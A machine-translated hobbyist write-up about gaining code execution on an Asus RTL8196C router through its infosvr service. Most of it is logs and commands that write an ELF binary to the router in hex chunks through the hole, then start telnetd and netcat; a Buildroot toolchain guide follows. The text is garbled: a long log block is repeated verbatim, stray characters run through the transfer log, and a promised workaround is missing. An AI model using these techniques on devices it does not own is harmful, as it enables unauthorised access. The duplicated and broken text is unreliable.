71.1% 152.9 Bps part 149 (48 B; cmd: 235 ch) 192.168.1.1: OK
71.6% 177.1 Bps part 150 (48 B; cmd: 235 ch) 192.168.1.1: OK
72.1% 122.8 Bps part 151 (48 B; cmd: 235 ch) 192.168.1.1: OK
72.5% 143.3 Bps part 152 (48 B; cmd: 235 ch) 192.168.1.1: OK
73.0% 145.9 Bps part 153 (48 B; cmd: 235 ch) ש LOST
73.0% 31.7 Bps part 153 (48 B; cmd: 235 ch) 192.168.1.1: OK
73.5% 432.4 Bps part 154 (48 B; cmd: 235 ch) 192.168.1.1: OK
74.0% 144.6 Bps part 155 (48 B; cmd: 235 ch) 192.168.1.1: OK
74.4% 145.5 Bps part 156 (48 B; cmd: 235 ch) 192.168.1.1: OK
74.9% 182.5 Bps part 157 (48 B; cmd: 235 ch) 192.168.1.1: OK
75.4% 117.1 Bps part 158 (48 B; cmd: 235 ch) 192.168.1.1: OK
75.9% 148.6 Bps part 159 (48 B; cmd: 235 ch) 192.168.1.1: OK
76.3% 183.9 Bps part 160 (48 B; cmd: 235 ch) 192.168.1.1: OK
76.8% 140.4 Bps part 161 (48 B; cmd: 235 ch) 192.168.1.1: OK
77.3% 121.2 Bps part 162 (48 B; cmd: 235 ch) 192.168.1.1: OK
77.8% 149.1 Bps part 163 (48 B; cmd: 235 ch) שש192.168.1.1: OK
78.2% 141.6 Bps part 164 (48 B; cmd: 235 ch) ש192.168.1.1: OK
78.7% 145.0 Bps part 165 (48 B; cmd: 235 ch) ש192.168.1.1: OK
79.2% 148.1 Bps part 166 (48 B; cmd: 235 ch) ש192.168.1.1: OK
79.7% 176.5 Bps part 167 (48 B; cmd: 235 ch) 192.168.1.1: OK
80.1% 121.5 Bps part 168 (48 B; cmd: 235 ch) שש192.168.1.1: OK
80.6% 145.5 Bps part 169 (48 B; cmd: 235 ch) שש192.168.1.1: OK
81.1% 144.6 Bps part 170 (48 B; cmd: 235 ch) ששLOST
81.1% 31.7 Bps part 170 (48 B; cmd: 235 ch) 192.168.1.1: OK
81.6% 417.4 Bps part 171 (48 B; cmd: 235 ch) שש192.168.1.1: OK
82.1% 144.6 Bps part 172 (48 B; cmd: 235 ch) שש192.168.1.1: OK
82.5% 182.5 Bps part 173 (48 B; cmd: 235 ch) 192.168.1.1: OK
83.0% 119.4 Bps part 174 (48 B; cmd: 235 ch) ש192.168.1.1: OK
83.5% 139.5 Bps part 175 (48 B; cmd: 235 ch) 192.168.1.1: OK
84.0% 145.9 Bps part 176 (48 B; cmd: 235 ch) 192.168.1.1: OK
84.4% 145.9 Bps part 177 (48 B; cmd: 235 ch) 192.168.1.1: OK
84.9% 142.0 Bps part 178 (48 B; cmd: 235 ch) 192.168.1.1: OK
85.4% 150.5 Bps part 179 (48 B; cmd: 235 ch) ש192.168.1.1: OK
85.9% 150.0 Bps part 180 (48 B; cmd: 235 ch) ש192.168.1.1: OK
86.3% 142.0 Bps part 181 (48 B; cmd: 235 ch) ש192.168.1.1: OK
86.8% 143.7 Bps part 182 (48 B; cmd: 235 ch) שש192.168.1.1: OK
87.3% 147.7 Bps part 183 (48 B; cmd: 235 ch) ש192.168.1.1: OK
87.8% 141.6 Bps part 184 (48 B; cmd: 235 ch) LOST
87.8% 32.0 Bps part 184 (48 B; cmd: 235 ch) 192.168.1.1: OK
88.2% 355.6 Bps part 185 (48 B; cmd: 235 ch) ש192.168.1.1: OK
88.7% 149.1 Bps part 186 (48 B; cmd: 235 ch) שש192.168.1.1: OK
89.2% 140.4 Bps part 187 (48 B; cmd: 235 ch) ש192.168.1.1: OK
89.7% 147.2 Bps part 188 (48 B; cmd: 235 ch) ש192.168.1.1: OK
90.1% 148.1 Bps part 189 (48 B; cmd: 235 ch) ש192.168.1.1: OK
90.6% 144.1 Bps part 190 (48 B; cmd: 235 ch) LOST
90.6% 32.0 Bps part 190 (48 B; cmd: 235 ch) 192.168.1.1: OK
91.1% 406.8 Bps part 191 (48 B; cmd: 235 ch) 192.168.1.1: OK
91.6% 142.9 Bps part 192 (48 B; cmd: 235 ch) 192.168.1.1: OK
92.0% 148.1 Bps part 193 (48 B; cmd: 235 ch) ש192.168.1.1: OK
92.5% 144.6 Bps part 194 (48 B; cmd: 235 ch) ש192.168.1.1: OK
93.0% 147.2 Bps part 195 (48 B; cmd: 235 ch) ש192.168.1.1: OK
93.5% 144.1 Bps part 196 (48 B; cmd: 235 ch) ש192.168.1.1: OK
94.0% 147.7 Bps part 197 (48 B; cmd: 235 ch) שש192.168.1.1: OK
94.4% 145.9 Bps part 198 (48 B; cmd: 235 ch) שש192.168.1.1: OK
94.9% 174.5 Bps part 199 (48 B; cmd: 235 ch) 192.168.1.1: OK
95.4% 123.4 Bps part 200 (48 B; cmd: 237 ch) 192.168.1.1: OK
Merging to /var/ldd parts 101..116 (16 pcs; cmd: 229 ch)… OK (5586 B)
Merging to /var/ldd parts 117..132 (16 pcs; cmd: 238 ch)… OK (6354 B)
Merging to /var/ldd parts 133..148 (16 pcs; cmd: 238 ch)… OK (7122 B)
Merging to /var/ldd parts 149..164 (16 pcs; cmd: 238 ch)… OK (7890 B)
Merging to /var/ldd parts 165..180 (16 pcs; cmd: 238 ch)… OK (8658 B)
Merging to /var/ldd parts 181..196 (16 pcs; cmd: 238 ch)… OK (9426 B)
Merging to /var/ldd parts 197..200 (4 pcs; cmd: 71 ch)… OK (9618 B)
Written 9.39KB/9.85KB 92.9 Bps (avg) Remaining: 00:05 (01:54/01:59)
95.9% 4.9 Bps part 201 (49 B; cmd: 237 ch) 192.168.1.1: OK
96.4% 146.7 Bps part 202 (49 B; cmd: 237 ch) 192.168.1.1: OK
96.8% 155.6 Bps part 203 (49 B; cmd: 237 ch) שש192.168.1.1: OK
97.3% 142.9 Bps part 204 (49 B; cmd: 237 ch) 192.168.1.1: OK
97.8% 153.1 Bps part 205 (49 B; cmd: 237 ch) LOST
97.8% 32.7 Bps part 205 (49 B; cmd: 237 ch) 192.168.1.1: OK
98.3% 388.9 Bps part 206 (49 B; cmd: 237 ch) ש192.168.1.1: OK
98.8% 148.5 Bps part 207 (49 B; cmd: 237 ch) 192.168.1.1: OK
99.3% 144.5 Bps part 208 (49 B; cmd: 237 ch) 192.168.1.1: OK
99.8% 151.2 Bps part 209 (49 B; cmd: 237 ch) ש192.168.1.1: OK
100.0% 75.3 Bps part 210 (25 B; cmd: 143 ch) שש192.168.1.1: OK
Merging to /var/ldd parts 201..210 (10 pcs; cmd: 145 ch)… OK (10084 B)
Written 9.85KB/9.85KB 78.7 Bps (avg) Remaining: 00:00 (02:00/02:00)
Finished. File size on target is 9.85KB. Working time: 02:00 (120 sec)
Note to the next spoiler
- At the place of /// *** my comments *** *** /// lines are deleted so as not to overload the text.
- And in place of /// --- such --- /// nothing has been removed. These are just explanations.
/ dev / console (/ dev / ttyS0) - note the name of the file to which output is redirected at different stages
system cmd: 237 echo -ne "\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x08\x50\x00\x00\x00\x34\x00\x00\x23\x54\x00\x00\x10\x07\x00\x34\x00\x20\x00\x08\x00\x28\x00">/var/ldd_0-1;cat /var/ldd_0-1
rund: echo -ne "\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x08\x50\x00\x00\x00\x34\x00\x00\x23\x54\x00\x00\x10\x07\x00\x34\x00\x20\x00\x08\x00\x28\x00">/var/ldd_0-1;cat /var/ldd_0-1 > /tmp/syscmd.out
49 ELF
system cmd: 237 echo -ne "\x1a\x00\x19\x00\x00\x00\x06\x00\x00\x00\x34\x00\x40\x00\x34\x00\x40\x00\x34\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x01\x34\x00\x40\x01\x34\x00\x40">/var/ldd_0-2;cat /var/ldd_0-2
rund: echo -ne "\x1a\x00\x19\x00\x00\x00\x06\x00\x00\x00\x34\x00\x40\x00\x34\x00\x40\x00\x34\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x01\x34\x00\x40\x01\x34\x00\x40">/var/ldd_0-2;cat /var/ldd_0-2 > /tmp/syscmd.out
49
///*** - — ***///
system cmd: 237 echo -ne "\x00\x00\x00\x03\x20\xf8\x09\x24\x44\x00\x01\x8f\xbc\x00\x18\x00\x40\x20\x21\x8f\x99\x80\xac\x02\x20\x28\x21\x03\x20\xf8\x09\xae\x02\x00\x00\x8f\xbc\x00\x18\x8e\x04\x00\x00\x8f\x99\x80\x68\x00">/var/ldd_0-100;cat /var/ldd_0-100
rund: echo -ne "\x00\x00\x00\x03\x20\xf8\x09\x24\x44\x00\x01\x8f\xbc\x00\x18\x00\x40\x20\x21\x8f\x99\x80\xac\x02\x20\x28\x21\x03\x20\xf8\x09\xae\x02\x00\x00\x8f\xbc\x00\x18\x8e\x04\x00\x00\x8f\x99\x80\x68\x00">/var/ldd_0-100;cat /var/ldd_0-100 > /tmp/syscmd.out
48
///--- ( ) ---///
system cmd: 35 echo -n "">>/var/ldd;wc -c</var/ldd
rund: echo -n "">>/var/ldd;wc -c</var/ldd > /tmp/syscmd.out
2 0
///--- ---///
system cmd: 228 cat /var/ldd_0-1 /var/ldd_0-2 /var/ldd_0-3 /var/ldd_0-4 /var/ldd_0-5 /var/ldd_0-6 /var/ldd_0-7 /var/ldd_0-8 /var/ldd_0-9 /var/ldd_0-10 /var/ldd_0-11 /var/ldd_0-12 /var/ldd_0-13 /var/ldd_0-14 /var/ldd_0-15 /var/ldd_0-16>/var/ldd;
rund: cat /var/ldd_0-1 /var/ldd_0-2 /var/ldd_0-3 /var/ldd_0-4 /var/ldd_0-5 /var/ldd_0-6 /var/ldd_0-7 /var/ldd_0-8 /var/ldd_0-9 /var/ldd_0-10 /var/ldd_0-11 /var/ldd_0-12 /var/ldd_0-13 /var/ldd_0-14 /var/ldd_0-15 /var/ldd_0-16>/var/ldd; > /tmp/syscmd.out
0 0
///--- ( ) ---///
system cmd: 14 wc -c</var/ldd
rund: wc -c</var/ldd > /tmp/syscmd.out
4 777
$D
system cmd: 238 cat /var/ldd_0-17 /var/ldd_0-18 /var/ldd_0-19 /var/ldd_0-20 /var/ldd_0-21 /var/ldd_0-22 /var/ldd_0-23 /var/ldd_0-24 /var/ldd_0-25 /var/ldd_0-26 /var/ldd_0-27 /var/ldd_0-28 /var/ldd_0-29 /var/ldd_0-30 /var/ldd_0-31 /var/ldd_0-32>>/var/ldd;
rund: cat /var/ldd_0-17 /var/ldd_0-18 /var/ldd_0-19 /var/ldd_0-20 /var/ldd_0-21 /var/ldd_0-22 /var/ldd_0-23 /var/ldd_0-24 /var/ldd_0-25 /var/ldd_0-26 /var/ldd_0-27 /var/ldd_0-28 /var/ldd_0-29 /var/ldd_0-30 /var/ldd_0-31 /var/ldd_0-32>>/var/ldd; > /tmp/syscmd.out
0 777
$D
system cmd: 14 wc -c</var/ldd
rund: wc -c</var/ldd > /tmp/syscmd.out
5 1545
$D
///*** — ***///
system cmd: 71 cat /var/ldd_0-97 /var/ldd_0-98 /var/ldd_0-99 /var/ldd_0-100>>/var/ldd;
rund: cat /var/ldd_0-97 /var/ldd_0-98 /var/ldd_0-99 /var/ldd_0-100>>/var/ldd; > /tmp/syscmd.out
0 4617
$D
system cmd: 14 wc -c</var/ldd
rund: wc -c</var/ldd > /tmp/syscmd.out
5 4809
$D
system cmd: 14 wc -c</var/ldd
rund: wc -c</var/ldd > /tmp/syscmd.out
5 4809
$D
///--- ---///
system cmd: 37 rm /var/ldd_0-*;ls /var/ldd_0-*|wc -l
ls: /var/ldd_0-*: No such file or directory
rund: rm /var/ldd_0-*;ls /var/ldd_0-*|wc -l > /tmp/syscmd.out
2 0
09
$D
///--- ( chunk-) ---///
system cmd: 237 echo -ne "\x00\x00\x00\x03\x20\xf8\x09\x00\x00\x00\x00\x8f\xbc\x00\x18\x3c\x03\x00\x41\xae\x02\x00\x08\x24\x02\x00\x01\xae\x02\x00\x04\xae\x00\x00\x0c\xac\x62\x21\x88\x12\x00\x00\x42\x00\x00\x00\x00\x8f\xa4">/var/ldd_1-1;cat /var/ldd_1-1
rund: echo -ne "\x00\x00\x00\x03\x20\xf8\x09\x00\x00\x00\x00\x8f\xbc\x00\x18\x3c\x03\x00\x41\xae\x02\x00\x08\x24\x02\x00\x01\xae\x02\x00\x04\xae\x00\x00\x0c\xac\x62\x21\x88\x12\x00\x00\x42\x00\x00\x00\x00\x8f\xa4">/var/ldd_1-1;cat /var/ldd_1-1 > /tmp/syscmd.out
49
system cmd: 237 echo -ne "\x01\x58\x00\x00\x00\x00\x94\x82\x00\x10\x00\x00\x00\x00\x24\x42\xff\xfe\x30\x42\xff\xff\x2c\x42\x00\x02\x10\x40\x00\x39\x24\x03\xff\x00\x8c\x82\x00\x04\x00\x00\x00\x00\x00\x62\x18\x24\x3c\x02\x01">/var/ldd_1-2;cat /var/ldd_1-2
rund: echo -ne "\x01\x58\x00\x00\x00\x00\x94\x82\x00\x10\x00\x00\x00\x00\x24\x42\xff\xfe\x30\x42\xff\xff\x2c\x42\x00\x02\x10\x40\x00\x39\x24\x03\xff\x00\x8c\x82\x00\x04\x00\x00\x00\x00\x00\x62\x18\x24\x3c\x02\x01">/var/ldd_1-2;cat /var/ldd_1-2 > /tmp/syscmd.out
49 X
///*** -- — ***///
system cmd: 237 echo -ne "\x00\x01\x00\x00\x00\x00\x00\x41\x21\xa0\x00\x00\x22\x84\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00">/var/ldd_2-9;cat /var/ldd_2-9
rund: echo -ne "\x00\x01\x00\x00\x00\x00\x00\x41\x21\xa0\x00\x00\x22\x84\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00">/var/ldd_2-9;cat /var/ldd_2-9 > /tmp/syscmd.out
49
system cmd: 143 echo -ne "\x00\x00\x00\x22\x84\x00\x00\x00\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00">/var/ldd_2-10;cat /var/ldd_2-10
rund: echo -ne "\x00\x00\x00\x22\x84\x00\x00\x00\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00">/var/ldd_2-10;cat /var/ldd_2-10 > /tmp/syscmd.out
25
system cmd: 35 echo -n "">>/var/ldd;wc -c</var/ldd
rund: echo -n "">>/var/ldd;wc -c</var/ldd > /tmp/syscmd.out
5 9618
system cmd: 145 cat /var/ldd_2-1 /var/ldd_2-2 /var/ldd_2-3 /var/ldd_2-4 /var/ldd_2-5 /var/ldd_2-6 /var/ldd_2-7 /var/ldd_2-8 /var/ldd_2-9 /var/ldd_2-10>>/var/ldd;
rund: cat /var/ldd_2-1 /var/ldd_2-2 /var/ldd_2-3 /var/ldd_2-4 /var/ldd_2-5 /var/ldd_2-6 /var/ldd_2-7 /var/ldd_2-8 /var/ldd_2-9 /var/ldd_2-10>>/var/ldd; > /tmp/syscmd.out
0 9618
system cmd: 14 wc -c</var/ldd
rund: wc -c</var/ldd > /tmp/syscmd.out
6 10084
system cmd: 37 rm /var/ldd_2-*;ls /var/ldd_2-*|wc -l
ls: /var/ldd_2-*: No such file or directory
rund: rm /var/ldd_2-*;ls /var/ldd_2-*|wc -l > /tmp/syscmd.out
2 0
084
system cmd: 35 echo -n "">>/var/ldd;wc -c</var/ldd
rund: echo -n "">>/var/ldd;wc -c</var/ldd > /tmp/syscmd.out
6 10084
rund: echo -ne "\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x08\x50\x00\x00\x00\x34\x00\x00\x23\x54\x00\x00\x10\x07\x00\x34\x00\x20\x00\x08\x00\x28\x00">/var/ldd_0-1;cat /var/ldd_0-1 > /tmp/syscmd.out
49 ELF
system cmd: 237 echo -ne "\x1a\x00\x19\x00\x00\x00\x06\x00\x00\x00\x34\x00\x40\x00\x34\x00\x40\x00\x34\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x01\x34\x00\x40\x01\x34\x00\x40">/var/ldd_0-2;cat /var/ldd_0-2
rund: echo -ne "\x1a\x00\x19\x00\x00\x00\x06\x00\x00\x00\x34\x00\x40\x00\x34\x00\x40\x00\x34\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x05\x00\x00\x00\x04\x00\x00\x00\x03\x00\x00\x01\x34\x00\x40\x01\x34\x00\x40">/var/ldd_0-2;cat /var/ldd_0-2 > /tmp/syscmd.out
49
///*** - — ***///
system cmd: 237 echo -ne "\x00\x00\x00\x03\x20\xf8\x09\x24\x44\x00\x01\x8f\xbc\x00\x18\x00\x40\x20\x21\x8f\x99\x80\xac\x02\x20\x28\x21\x03\x20\xf8\x09\xae\x02\x00\x00\x8f\xbc\x00\x18\x8e\x04\x00\x00\x8f\x99\x80\x68\x00">/var/ldd_0-100;cat /var/ldd_0-100
rund: echo -ne "\x00\x00\x00\x03\x20\xf8\x09\x24\x44\x00\x01\x8f\xbc\x00\x18\x00\x40\x20\x21\x8f\x99\x80\xac\x02\x20\x28\x21\x03\x20\xf8\x09\xae\x02\x00\x00\x8f\xbc\x00\x18\x8e\x04\x00\x00\x8f\x99\x80\x68\x00">/var/ldd_0-100;cat /var/ldd_0-100 > /tmp/syscmd.out
48
///--- ( ) ---///
system cmd: 35 echo -n "">>/var/ldd;wc -c</var/ldd
rund: echo -n "">>/var/ldd;wc -c</var/ldd > /tmp/syscmd.out
2 0
///--- ---///
system cmd: 228 cat /var/ldd_0-1 /var/ldd_0-2 /var/ldd_0-3 /var/ldd_0-4 /var/ldd_0-5 /var/ldd_0-6 /var/ldd_0-7 /var/ldd_0-8 /var/ldd_0-9 /var/ldd_0-10 /var/ldd_0-11 /var/ldd_0-12 /var/ldd_0-13 /var/ldd_0-14 /var/ldd_0-15 /var/ldd_0-16>/var/ldd;
rund: cat /var/ldd_0-1 /var/ldd_0-2 /var/ldd_0-3 /var/ldd_0-4 /var/ldd_0-5 /var/ldd_0-6 /var/ldd_0-7 /var/ldd_0-8 /var/ldd_0-9 /var/ldd_0-10 /var/ldd_0-11 /var/ldd_0-12 /var/ldd_0-13 /var/ldd_0-14 /var/ldd_0-15 /var/ldd_0-16>/var/ldd; > /tmp/syscmd.out
0 0
///--- ( ) ---///
system cmd: 14 wc -c</var/ldd
rund: wc -c</var/ldd > /tmp/syscmd.out
4 777
$D
system cmd: 238 cat /var/ldd_0-17 /var/ldd_0-18 /var/ldd_0-19 /var/ldd_0-20 /var/ldd_0-21 /var/ldd_0-22 /var/ldd_0-23 /var/ldd_0-24 /var/ldd_0-25 /var/ldd_0-26 /var/ldd_0-27 /var/ldd_0-28 /var/ldd_0-29 /var/ldd_0-30 /var/ldd_0-31 /var/ldd_0-32>>/var/ldd;
rund: cat /var/ldd_0-17 /var/ldd_0-18 /var/ldd_0-19 /var/ldd_0-20 /var/ldd_0-21 /var/ldd_0-22 /var/ldd_0-23 /var/ldd_0-24 /var/ldd_0-25 /var/ldd_0-26 /var/ldd_0-27 /var/ldd_0-28 /var/ldd_0-29 /var/ldd_0-30 /var/ldd_0-31 /var/ldd_0-32>>/var/ldd; > /tmp/syscmd.out
0 777
$D
system cmd: 14 wc -c</var/ldd
rund: wc -c</var/ldd > /tmp/syscmd.out
5 1545
$D
///*** — ***///
system cmd: 71 cat /var/ldd_0-97 /var/ldd_0-98 /var/ldd_0-99 /var/ldd_0-100>>/var/ldd;
rund: cat /var/ldd_0-97 /var/ldd_0-98 /var/ldd_0-99 /var/ldd_0-100>>/var/ldd; > /tmp/syscmd.out
0 4617
$D
system cmd: 14 wc -c</var/ldd
rund: wc -c</var/ldd > /tmp/syscmd.out
5 4809
$D
system cmd: 14 wc -c</var/ldd
rund: wc -c</var/ldd > /tmp/syscmd.out
5 4809
$D
///--- ---///
system cmd: 37 rm /var/ldd_0-*;ls /var/ldd_0-*|wc -l
ls: /var/ldd_0-*: No such file or directory
rund: rm /var/ldd_0-*;ls /var/ldd_0-*|wc -l > /tmp/syscmd.out
2 0
09
$D
///--- ( chunk-) ---///
system cmd: 237 echo -ne "\x00\x00\x00\x03\x20\xf8\x09\x00\x00\x00\x00\x8f\xbc\x00\x18\x3c\x03\x00\x41\xae\x02\x00\x08\x24\x02\x00\x01\xae\x02\x00\x04\xae\x00\x00\x0c\xac\x62\x21\x88\x12\x00\x00\x42\x00\x00\x00\x00\x8f\xa4">/var/ldd_1-1;cat /var/ldd_1-1
rund: echo -ne "\x00\x00\x00\x03\x20\xf8\x09\x00\x00\x00\x00\x8f\xbc\x00\x18\x3c\x03\x00\x41\xae\x02\x00\x08\x24\x02\x00\x01\xae\x02\x00\x04\xae\x00\x00\x0c\xac\x62\x21\x88\x12\x00\x00\x42\x00\x00\x00\x00\x8f\xa4">/var/ldd_1-1;cat /var/ldd_1-1 > /tmp/syscmd.out
49
system cmd: 237 echo -ne "\x01\x58\x00\x00\x00\x00\x94\x82\x00\x10\x00\x00\x00\x00\x24\x42\xff\xfe\x30\x42\xff\xff\x2c\x42\x00\x02\x10\x40\x00\x39\x24\x03\xff\x00\x8c\x82\x00\x04\x00\x00\x00\x00\x00\x62\x18\x24\x3c\x02\x01">/var/ldd_1-2;cat /var/ldd_1-2
rund: echo -ne "\x01\x58\x00\x00\x00\x00\x94\x82\x00\x10\x00\x00\x00\x00\x24\x42\xff\xfe\x30\x42\xff\xff\x2c\x42\x00\x02\x10\x40\x00\x39\x24\x03\xff\x00\x8c\x82\x00\x04\x00\x00\x00\x00\x00\x62\x18\x24\x3c\x02\x01">/var/ldd_1-2;cat /var/ldd_1-2 > /tmp/syscmd.out
49 X
///*** -- — ***///
system cmd: 237 echo -ne "\x00\x01\x00\x00\x00\x00\x00\x41\x21\xa0\x00\x00\x22\x84\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00">/var/ldd_2-9;cat /var/ldd_2-9
rund: echo -ne "\x00\x01\x00\x00\x00\x00\x00\x41\x21\xa0\x00\x00\x22\x84\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00">/var/ldd_2-9;cat /var/ldd_2-9 > /tmp/syscmd.out
49
system cmd: 143 echo -ne "\x00\x00\x00\x22\x84\x00\x00\x00\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00">/var/ldd_2-10;cat /var/ldd_2-10
rund: echo -ne "\x00\x00\x00\x22\x84\x00\x00\x00\xce\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00">/var/ldd_2-10;cat /var/ldd_2-10 > /tmp/syscmd.out
25
system cmd: 35 echo -n "">>/var/ldd;wc -c</var/ldd
rund: echo -n "">>/var/ldd;wc -c</var/ldd > /tmp/syscmd.out
5 9618
system cmd: 145 cat /var/ldd_2-1 /var/ldd_2-2 /var/ldd_2-3 /var/ldd_2-4 /var/ldd_2-5 /var/ldd_2-6 /var/ldd_2-7 /var/ldd_2-8 /var/ldd_2-9 /var/ldd_2-10>>/var/ldd;
rund: cat /var/ldd_2-1 /var/ldd_2-2 /var/ldd_2-3 /var/ldd_2-4 /var/ldd_2-5 /var/ldd_2-6 /var/ldd_2-7 /var/ldd_2-8 /var/ldd_2-9 /var/ldd_2-10>>/var/ldd; > /tmp/syscmd.out
0 9618
system cmd: 14 wc -c</var/ldd
rund: wc -c</var/ldd > /tmp/syscmd.out
6 10084
system cmd: 37 rm /var/ldd_2-*;ls /var/ldd_2-*|wc -l
ls: /var/ldd_2-*: No such file or directory
rund: rm /var/ldd_2-*;ls /var/ldd_2-*|wc -l > /tmp/syscmd.out
2 0
084
system cmd: 35 echo -n "">>/var/ldd;wc -c</var/ldd
rund: echo -n "">>/var/ldd;wc -c</var/ldd > /tmp/syscmd.out
6 10084
So what's next?
As you know, in Linux, in order to run the file for execution, you need to set the appropriate permissions for it. The problem is that there is no chmod on the router (remember about the heavily truncated busybox ?). But nothing. Is there a way around this:
Profit!We just downloaded our executable file to the router, and it works! Although wait ... And where did we get it, this file?
How to get executable files for your router
First of all, you need to know the architecture of your router's CPU. The easy way does not give all the necessary information:
# cat / proc / cpuinfo
system type: RTL8196C
processor: 0
cpu model: 52481
BogoMIPS: 389.12
tlb_entries: 32
mips16 adopted: yes
#
You can, of course, search the datasheet and find this information in it ... And if it is not available? And if there are different modifications? The surest way is to look at what is already working.
We'll have to somehow get the executable file from the router to analyze it using the file and readelf -h commands .
I did it like this:
- I launched telnetd and connected TeraTerm to it
- set up TeraTerm to log to a file with the option "binary"
- I do not touch TeraTerm anymore (so that nothing extra gets into the top of the log)
- executed AsusCmd.exe "cat / bin / infosvr> / dev / ttyp0;"
- stopped log to file
The resulting file came out a little more than what lies on the router (some garbage mixed in). But nothing: we are only interested in the beginning of the file - ELF Header.
We transfer the file to the machine with Linux. Now you can see the title:
Now everything is clear: MIPS-1, Big endian.
We collect tulcheyn for our router
Here is my script memo (choose a configurator to your taste):
#!/bin/sh wget http://buildroot.uclibc.org/downloads/buildroot-2014.11.tar.gz tar zxf buildroot-2014.11.tar.gz cd buildroot-2014.11 sudo apt-get -y install g++ # curses-based configurators sudo apt-get -y install libncurses5-dev make menuconfig # original curses-based configurator #make nconfig # new curses-based configurator # Qt-based configurator #sudo apt-get -y install libqt4-dev #make xconfig # Qt-based configurator # GTK-based configurator #sudo apt-get -y install libgtk2.0-dev libglade2-dev #make gconfig # GTK-based configurator make At the make * config step, configure the toolchain.
At the very least, you need to configure the target architecture. Target options ---> Target Architecture and Target Architecture Variant . There is a small catch: you won't find it right away in Target Architecture Variant Mips I. To make it appear there you need to enable the option Build options ---> Show options and packages that are deprecated or obsolete .
You can not configure anything else. And you can still configure a lot of things: include support for C ++ and other languages, static layout (I haven't done anything good with this), choose applets compiled for the target architecture of the applicationbusybox , library versions, etc.
After setting, select Exit , agree with saving the new configuration and ... make . The build will take a long time, depending on what you have chosen in the settings (I only took a little more than half an hour when setting up the architecture of the target processor). I measured this:
You should never use make-jN with Buildroot: top-level parallel make it is not currently supported. An INSTEAD, use the BR2_JLEVEL option to tell's Buildroot the run to the compilation of each Individual package with the make -jN .Those.you need to configure the parameter Build options ---> Number of jobs to run simultaneously .
Toolchain ready
Finally, after xx minutes, the toolchain gathered together completely and without errors. Can be used. GCC for the router will follow the path ./buildroot-2014.11/output/host/usr/bin/mips-linux-gcc (symlink to mips-buildroot-linux-uclibc-gcc ).
First, let's write a primitive program, compile it, fill it in with the router, set the execution permission (the trick shown earlier) and run:
Now you can write your own programs for the router, considering the limited resources and the capabilities of the libraries that are on the router.
But along with the toolchain, some binaries gathered on the target platform! They lie here: ./buildroot-2014 / 11 / output / target/ bin | sbin | usr / bin | usr / sbin . I have tried many of them (inmenuconfig configured to build a variety of additional applications). Those that turned out to be workers and seemed useful saved separately (maybe sometime needed).
Workers were not all. After downloading to the router, many refused to work for various reasons:
- most often - can't load library 'some library'
- partially work - can't resolve symbol 'some symbol'
- Segmentation fault - no comments
- and all statically linked - Illegal instruction
And if you have an error like Bus error or unexpected word , then most likely you made a mistake with the choice of the target architecture (or the file is corny).
Increase comfort
You, probably, noticed that the speed of file transfer through the “hole” in infosvr , to put it mildly, leaves much to be desired. I wanted to solve this problem by writing TargetSideAgent , which would weigh a little and raise a full TCP connection. Already a bit of code written, as SUDDENLY discovered the netcat wonder utility ! This utility was working among the applications compiled by buildroot for the target platform. Now you don’t have to suffer for a long time - netcat transfers files to the router (and from the router too) almost instantly! For quick transfer, you can now use this approach:
- using AsusBinWrite, we upload to the netcat router
- set him permission to perform
- we start on reception:
./netcat -vvlp 8888> recvfile
- And from the computer we start the transfer:
ncat.exe -vv --send-only 192.168.1.1 8888 <Useful \ cpuload
By the way, if for some reason your file transfer with AsusBinWrite was interrupted, you can resume it using the RESUME option :
Resuming Interrupted Transmission
Now the speed is decent and you can easily upload even “weighty” files. But do not get carried away. Do not forget that / var and / tmp (which is actually / var / tmp ) is the memory of the router. If you score it completely, the router will stop responding (or freeze at all). In this case, you will have to restart it manually. Control free memory with free .
By the way, when I was looking for netcat under Windows, I came across the " 21st century netcat ". It is much richer in functionality than the usual netcat . For our case, the --send-only option turned out to be very useful (to break the connection immediately after the transfer).
What else can you do?
Look at this 'farm':
# mount
rootfs on / type rootfs (rw)
/dev/root on / type squashfs (ro,relatime)
proc on /proc type proc (rw,relatime)
ramfs on /var type ramfs (rw,relatime)
#
# cat /proc/partitions
major minor #blocks name
31 0 64 mtdblock0
31 1 3211 mtdblock1
31 2 4032 mtdblock2
#
# cat /proc/mtd
dev: size erasesize name
mtd0: 00010000 00001000 «boot + cfg»
mtd1: 00322fee 00001000 «root fs»
mtd2: 003f0000 00001000 «linux + root fs»
#
# ls -lF /dev
crw-rw-rw- 1 root root 4, 64 Sep 18 20:22 console
